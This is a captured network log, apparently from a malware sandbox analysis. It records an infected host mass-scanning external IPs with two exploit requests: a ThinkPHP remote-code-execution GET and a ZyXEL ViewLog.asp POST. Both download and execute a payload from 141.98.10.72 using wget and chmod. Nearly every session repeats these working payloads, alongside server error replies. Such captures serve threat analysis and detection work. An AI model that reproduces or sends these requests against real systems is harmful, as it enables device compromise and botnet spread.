                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            537192.168.2.233717895.168.203.16380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.815869093 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:09.026940107 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:08 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            538192.168.2.234671695.107.144.23580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.828010082 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:09.051173925 CET159INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=utf-8
                                                            Date: Wed, 14 Feb 2024 08:29:08 GMT
                                                            Connection: close
                                                            Content-Length: 2959
                                                            Data Raw: 3c
                                                            Data Ascii: <
                                                            Feb 14, 2024 09:29:09.051187992 CET1286INData Raw: 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 61 63 65 62 6f 6f 6b 20 7c 20 45 72 72 6f 72
                                                            Data Ascii: !DOCTYPE html><html lang="en" id="facebook"> <head> <title>Facebook | Error</title> <meta charset="utf-8"> <meta http-equiv="cache-control" content="no-cache"> <meta http-equiv="cache-control" content="no-store"> <meta h
                                                            Feb 14, 2024 09:29:09.051223040 CET1286INData Raw: 6b 5f 32 78 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 72 65 22 3e 0a 20 20 20 20 20 20 3c 68 31 20 69 64 3d 22 73 6f 72 72 79 22 3e 53 6f 72 72 79 2c
                                                            Data Ascii: k_2x.png" /> </a> </div> <div id="core"> <h1 id="sorry">Sorry, something went wrong.</h1> <p id="promise"> We're working on it and we'll get it fixed as soon as we can. </p> <p id="back-link">
                                                            Feb 14, 2024 09:29:09.051235914 CET422INData Raw: 31 36 70 78 27 3b 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 69 66 20 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 20 3c 20 31 35 30 29 20 7b 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79
                                                            Data Ascii: 16px'; }; if (window.innerWidth < 150) { document.getElementById('promise').style.display = 'none'; }; if (window.innerHeight < 150) { document.getElementById('sorry').style.margin = '4px 0 0 0';


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            539192.168.2.233511695.100.246.15780
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:08.981352091 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:09.174043894 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:09 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:09 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 63 31 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 33 34 39 26 23 34 36 3b 36 63 35 61 39 33 61 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4c1a7b5c&#46;1707899349&#46;6c5a93af</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            540192.168.2.236069295.86.121.508080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:09.023986101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            541192.168.2.234134685.74.227.718080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:09.027126074 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:09.283699036 CET411INHTTP/1.1 404 Not Found
                                                            Date: Wed, 14 Feb 2024 10:24:03 GMT
                                                            Server: Webs
                                                            X-Frame-Options: SAMEORIGIN
                                                            Cache-Control: no-cache
                                                            Content-Length: 166
                                                            Content-Type: text/html
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=60, max=99
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            542192.168.2.235659295.131.48.10180
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:09.033559084 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:09.251522064 CET500INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:09 GMT
                                                            Server: Apache/2.4.18 (Ubuntu)
                                                            Content-Length: 306
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6d 61 69 6c 2e 7a 65 72 72 69 73 2e 68 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.18 (Ubuntu) Server at mail.zerris.hu Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            543192.168.2.235898294.120.163.1858080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:09.033777952 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            544192.168.2.233542462.29.49.1438080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:09.035851955 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            545192.168.2.233728495.217.224.3080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:09.043795109 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:09.271811008 CET325INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:29:09 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 96<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            546192.168.2.235911431.136.101.1078080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:09.516936064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:12.633198977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:18.776329041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:30.806660891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:54.867368937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:44.012581110 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            547192.168.2.234919085.69.154.2508080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:10.002186060 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:16.472785950 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:23.895665884 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:38.741570950 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:09.201312065 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            548192.168.2.235478894.120.55.1528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:10.248224020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            549192.168.2.236074094.187.104.118080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:10.255043983 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            550192.168.2.235051231.0.129.628080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:10.276036024 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
